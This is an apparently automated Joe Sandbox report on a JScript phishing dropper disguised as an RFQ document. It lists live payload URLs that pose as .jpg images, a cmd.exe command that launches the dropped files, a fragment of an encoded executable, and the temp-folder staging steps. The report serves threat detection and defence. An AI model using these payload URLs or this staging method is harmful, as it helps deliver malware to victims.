Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-PR 1-62557 & 38929 III.js

Overview

General Information

Sample name:RFQ-PR 1-62557 & 38929 III.js
Analysis ID:1615392
MD5:335396680f20357d3ca2ffbe51f6e7a2
SHA1:631e51f1cfd39c40c9987bee53ce25cb05b74b3a
SHA256:93750a9917b952e019c6ed6faf8cf273cc730a6047b5ef65741c4d0c5c691278
Tags:jsuser-abuse_ch
Infos:

Detection

Score:88
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
JavaScript file contains suspicious strings
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • wscript.exe (PID: 4144 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1200 cmdline: "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.112.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4144, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", ProcessId: 4144, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.112.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4144, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js", ProcessId: 4144, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg#Avira URL Cloud: Label: malware
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8Avira URL Cloud: Label: malware
Source: https://www2.0zz0.com/2025/01/31/04/672996792.jpgAvira URL Cloud: Label: malware
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpgAvira URL Cloud: Label: malware
Source: RFQ-PR 1-62557 & 38929 III.jsVirustotal: Detection: 13%Perma Link
Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49704 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.112.1 443Jump to behavior
Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /2025/01/31/04/672996792.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2025/01/31/04/195774460.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /2025/01/31/04/672996792.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /2025/01/31/04/195774460.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: www2.0zz0.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Feb 2025 19:32:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5bIw4WfFci4WiSx5X2u%2BIfVaJIb5bcnXMCqjheCwy96VHQRlaqfwyDtj3lqdZGgglnCJW%2BstpIwMg02uAxgwL3ZKTElE%2BqGcOSLo2H36SJq1CAhSdMScLF2nCXlu4D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=15552000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 911f7c0389bc43b3-EWR
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/1957
Source: wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp, RFQ-PR 1-62557 & 38929 III.jsString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg
Source: wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg#
Source: wscript.exe, 00000000.00000003.2024121506.000001981832E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8
Source: wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpgk
Source: wscript.exe, 00000000.00000003.2086953526.00000198187B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053256942.0000019819005000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088150100.0000019818AB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085334086.0000019816521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088888179.0000019816522000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086579467.00000198183A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085295307.000001981901C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2022748516.00000198185AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2022946684.00000198187B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2089402259.000001981901C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085277039.0000019816515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086752965.00000198185AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp, RFQ-PR 1-62557 & 38929 III.jsString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpg
Source: wscript.exe, 00000000.00000003.2024195004.00000198182BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025131758.00000198182F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpg48578894
Source: wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpge
Source: wscript.exe, 00000000.00000002.2089113128.00000198182E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088035837.00000198182E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/2Z%
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/?
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.0zz0.com/O
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Source: RFQ-PR 1-62557 & 38929 III.jsInitial file: wscript.shell, adodb.stream, responsebody, cmd.exe
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: RFQ-PR 1-62557 & 38929 III.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal88.evad.winJS@4/4@1/1
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\195774460[1].jpgJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\aqgeukibkalJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: RFQ-PR 1-62557 & 38929 III.jsVirustotal: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "ingobxndsgvxkm.bls");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "tbcj.onj");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj", "true");ITextStream.Write("0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]80/]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]FC29_7*4_848D9F7_848D9F7_848D9F70C");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "ingobxndsgvxkm.bls");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "tbcj.onj");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj", "true");ITextStream.Write("0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]80/]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wscript.exe, 00000000.00000003.2087277253.000001981652C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816528000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088903608.000001981652C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2087277253.000001981652C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816528000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088903608.000001981652C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
Source: wscript.exe, 00000000.00000003.2085295307.000001981900D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.112.1 443Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information22
Scripting
Valid AccountsWindows Management Instrumentation22
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
111
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
RFQ-PR 1-62557 & 38929 III.js13%VirustotalBrowse
RFQ-PR 1-62557 & 38929 III.js8%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www2.0zz0.com/2025/01/31/04/19570%Avira URL Cloudsafe
https://www2.0zz0.com/O0%Avira URL Cloudsafe
https://www2.0zz0.com/2025/01/31/04/672996792.jpg485788940%Avira URL Cloudsafe
https://www2.0zz0.com/2025/01/31/04/195774460.jpgk0%Avira URL Cloudsafe
https://www2.0zz0.com/?0%Avira URL Cloudsafe
https://www2.0zz0.com/2Z%0%Avira URL Cloudsafe
https://www2.0zz0.com/2025/01/31/04/672996792.jpge0%Avira URL Cloudsafe
https://www2.0zz0.com/2025/01/31/04/195774460.jpg#100%Avira URL Cloudmalware
https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8100%Avira URL Cloudmalware
https://www2.0zz0.com/2025/01/31/04/672996792.jpg100%Avira URL Cloudmalware
https://www2.0zz0.com/2025/01/31/04/195774460.jpg100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
www2.0zz0.com
104.21.112.1
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://www2.0zz0.com/2025/01/31/04/672996792.jpgtrue
    • Avira URL Cloud: malware
    unknown
    https://www2.0zz0.com/2025/01/31/04/195774460.jpgtrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      https://www2.0zz0.com/Owscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www2.0zz0.com/2025/01/31/04/1957wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://www2.0zz0.com/2025/01/31/04/672996792.jpgewscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
